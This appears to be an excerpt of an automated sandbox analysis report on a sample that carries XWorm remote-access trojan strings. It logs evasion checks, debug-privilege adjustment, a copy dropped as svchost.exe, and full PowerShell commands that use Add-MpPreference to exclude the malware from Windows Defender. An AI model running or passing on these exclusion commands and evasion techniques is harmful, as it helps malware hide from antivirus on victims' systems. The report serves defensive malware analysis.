                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 1A9A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 2410000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 1A410000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 5A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 1A4A0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 6327Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 3515Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5707Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4080Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5330Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4279Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2628Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6915Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7593
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1980
                        Source: C:\Users\user\Desktop\file.exe TID: 5432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 2628 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 6915 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744Thread sleep count: 7593 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep count: 1980 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Users\user\AppData\Local\svchost.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\svchost.exe TID: 4248Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\svchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\svchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
                        Source: file.exe, 00000000.00000002.2963211372.000000001B9A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                        Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                        Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                        Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2-
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
